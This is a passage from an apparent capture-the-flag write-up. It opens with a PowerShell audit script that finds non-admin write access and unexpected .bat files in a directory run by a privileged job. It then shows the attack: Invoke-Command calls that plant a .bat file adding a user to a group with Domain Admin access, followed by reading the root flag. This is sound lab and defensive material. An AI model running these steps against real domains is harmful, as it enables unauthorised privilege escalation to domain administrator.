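                 [System.Security.AccessControl.FileSystemRights]::FullControl -bor
                 [System.Security.AccessControl.FileSystemRights]::CreateFiles

    (Get-Acl -Path $Path).Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $_.IdentityReference.Value -notin $trusted -and
            ($_.FileSystemRights -band $writeBits) -ne 0
        } |
        ForEach-Object {
            [pscustomobject]@{
                Path      = $Path
                Identity  = $_.IdentityReference.Value
                Rights    = $_.FileSystemRights
                Inherited = $_.IsInherited
            }
        }
}

function Test-BatDropZone {
    # Combines the ACL check with an inventory of .bat files anywhere below $Path,
    # because for /R recurses: a file in a subfolder is executed just the same.
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$ExpectedScripts = @()   # file names that legitimately live here
    )
    $writable   = @(Get-WritableByNonAdmin -Path $Path)
    $unexpected = @(Get-ChildItem -Path $Path -Filter '*.bat' -Recurse -File |
                    Where-Object { $_.Name -notin $ExpectedScripts } |
                    Select-Object -ExpandProperty FullName)
    [pscustomobject]@{
        Path               = $Path
        NonAdminWriteAces  = $writable
        UnexpectedBatFiles = $unexpected
        AtRisk             = ($writable.Count -gt 0 -or $unexpected.Count -gt 0)
    }
}

# Usage: the directory from the writeup, with the one script that belongs there.
Test-BatDropZone -Path "$env:ProgramFiles\keepmeon" -ExpectedScripts 'keepmeon.bat' | Format-List
```

If the job that calls these scripts runs under a privileged account, every write ACE the check reports is effectively that account's privilege handed to the ACE's principal. The durable fix is to make the directory writable only by administrators and to have the job run a fixed, known script rather than whatever it finds; the check above is what you run to confirm both.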

The comment field says that the site_admin group has access to Domain Admins:

PS C:\Utils> Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}

Group name     Site_Admin
Comment        Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
The command completed successfully.

Write a .bat file to add awallace to site_admin:

Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {Set-Content -Value 'net group site_admin awallace /add /domain' -Path "C:\Program Files\keepmeon\blind0bandit.bat"}

After a few minutes, the user is added:

Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {net group site_admin}

Group name     Site_Admin
Comment        Only in the event of emergencies is this to be populated. This has access to Domain Admin group

Members

-------------------------------------------------------------------------------
awallace                 
The command completed successfully.

Now that awallace is in Site_Admin, the root flag can be read:

Invoke-Command -Credential $credential -ConfigurationName dc_manage -ComputerName atsserver -ScriptBlock {cat C:\Users\Administrator\Desktop\root.txt}
d078dca1007c6bcdc86xxxxxxxxxxxxxxx

Root Flag: d078dca1007c6bcdxxxxxxxxxxxxxxxx
